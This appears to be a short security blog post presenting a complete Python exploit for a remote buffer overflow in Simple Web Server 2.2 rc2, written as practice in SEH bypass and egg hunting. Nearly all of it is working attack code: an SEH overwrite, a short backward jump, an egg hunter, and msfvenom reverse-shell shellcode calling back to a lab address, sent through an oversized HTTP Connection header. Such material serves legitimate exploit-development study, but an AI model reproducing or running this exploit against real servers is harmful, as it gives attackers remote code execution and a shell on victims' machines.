I was looking for a vulnerable application to practice SEH Bypass and Egg Hunting techniques. I found this exploit on Exploit-DB which exploits a remote buffer overflow vulnerability in Simple Web Server 2.2 rc2.
The author of this vulnerability tested this exploit on a Windows XP machine and it’s a simple EIP overwrite exploit. I decided to modify it for reverse shell using SEH bypass and Egg Hunting as there was not much space left for the shellcode.
Here is the final exploit code:
#!/usr/bin/env python import sys,socket # Exploit Title: [Simple Web Server 2.2 rc2 - Remote Buffer Overflow (SEH Bypass + Egg Hunter) ] # Date: [02/01/2018] # Vulnerability Credit: [mr.pr0n (@_pr0n_)] # Exploit Author: [SlidingWindow] , Twitter: @kapil_khot # Home Page: [https://slidingwindow0xff.wordpress.com/] # Vendor Homepage: [] # Version: [Simple Web Server 2.2 rc2] # Tested on: [Windows 7] # CVE : [] ''' root@kali:~# ./exploit.py 192.168.253.136 [+]Sending junk + egg hunter + shellcode to the target... [+]Junk sent to the target... [+]Got shell!!??? ''' if len(sys.argv) <2: print "\n[+]Usage:\n ./SimpleWebServer.py \n" sys.exit() target = sys.argv[1] #junk = "A" * 2300 #pattern_offset.rb shows offset at 2284 #This overwrites SEH record with Bs #junk = "A" * 2284 + "B" * 4 + "C" * (2300 - 4 ) seh = "\x7e\x44\xc5\x6f" #0x6FC5447E POP ESI, POP EDI, RETN #junk = "A" * 2284 + seh + "C" * (2300 - 4 ) nseh = "\xeb\xd0\x90\x90" #EB D0 - Short JMP 46 bytes backwards in memory. This gives us 46 bytes to put our egg hunter routine. #junk = "A" * (2284 - 46 - len(nseh))+ "B" * 46 + nseh + seh + "C" * (2300 - 4 ) egg = "w00tw00t" #A 4-byte tag to look for in memory #32-byte egg hunter hunter =( "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "w00t" "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" ) #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.132 LPORT=443 -f c -b "\x00\x0a\x0d\x1a" EXITFUNC=thread #payload size 351 bytes shellcode = ( "\xdd\xc7\xbb\xf8\xa7\xf4\x99\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" "\x52\x83\xc5\x04\x31\x5d\x13\x03\xa5\xb4\x16\x6c\xa9\x53\x54" "\x8f\x51\xa4\x39\x19\xb4\x95\x79\x7d\xbd\x86\x49\xf5\x93\x2a" "\x21\x5b\x07\xb8\x47\x74\x28\x09\xed\xa2\x07\x8a\x5e\x96\x06" "\x08\x9d\xcb\xe8\x31\x6e\x1e\xe9\x76\x93\xd3\xbb\x2f\xdf\x46" "\x2b\x5b\x95\x5a\xc0\x17\x3b\xdb\x35\xef\x3a\xca\xe8\x7b\x65" "\xcc\x0b\xaf\x1d\x45\x13\xac\x18\x1f\xa8\x06\xd6\x9e\x78\x57" "\x17\x0c\x45\x57\xea\x4c\x82\x50\x15\x3b\xfa\xa2\xa8\x3c\x39" "\xd8\x76\xc8\xd9\x7a\xfc\x6a\x05\x7a\xd1\xed\xce\x70\x9e\x7a" "\x88\x94\x21\xae\xa3\xa1\xaa\x51\x63\x20\xe8\x75\xa7\x68\xaa" "\x14\xfe\xd4\x1d\x28\xe0\xb6\xc2\x8c\x6b\x5a\x16\xbd\x36\x33" "\xdb\x8c\xc8\xc3\x73\x86\xbb\xf1\xdc\x3c\x53\xba\x95\x9a\xa4" "\xbd\x8f\x5b\x3a\x40\x30\x9c\x13\x87\x64\xcc\x0b\x2e\x05\x87" "\xcb\xcf\xd0\x08\x9b\x7f\x8b\xe8\x4b\xc0\x7b\x81\x81\xcf\xa4" "\xb1\xaa\x05\xcd\x58\x51\xce\x32\x34\xa4\x8a\xdb\x47\x56\x92" "\xa0\xc1\xb0\xfe\xc6\x87\x6b\x97\x7f\x82\xe7\x06\x7f\x18\x82" "\x09\x0b\xaf\x73\xc7\xfc\xda\x67\xb0\x0c\x91\xd5\x17\x12\x0f" "\x71\xfb\x81\xd4\x81\x72\xba\x42\xd6\xd3\x0c\x9b\xb2\xc9\x37" "\x35\xa0\x13\xa1\x7e\x60\xc8\x12\x80\x69\x9d\x2f\xa6\x79\x5b" "\xaf\xe2\x2d\x33\xe6\xbc\x9b\xf5\x50\x0f\x75\xac\x0f\xd9\x11" "\x29\x7c\xda\x67\x36\xa9\xac\x87\x87\x04\xe9\xb8\x28\xc1\xfd" "\xc1\x54\x71\x01\x18\xdd\x91\xe0\x88\x28\x3a\xbd\x59\x91\x27" "\x3e\xb4\xd6\x51\xbd\x3c\xa7\xa5\xdd\x35\xa2\xe2\x59\xa6\xde" "\x7b\x0c\xc8\x4d\x7b\x05") print "[+]Sending junk + egg hunter + shellcode to the target..." junk = "A" * (2284 - len(egg) - len(shellcode) - 46 - len(nseh)) + egg + shellcode + "\x90" * (46 - len(hunter)) + hunter + nseh + seh + "C" * (2300 - 2284 - 4 ) buf = "GET / HTTP/1.1\n" buf += "HOST: " + target + "\n" buf += "User-Agent: Mozilla/5.0 \n" buf += "Connection: " + junk + "\r\n\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, 80)) sock.send(buf) print "[+]Junk sent to the target..." print "[+]Got shell!!???"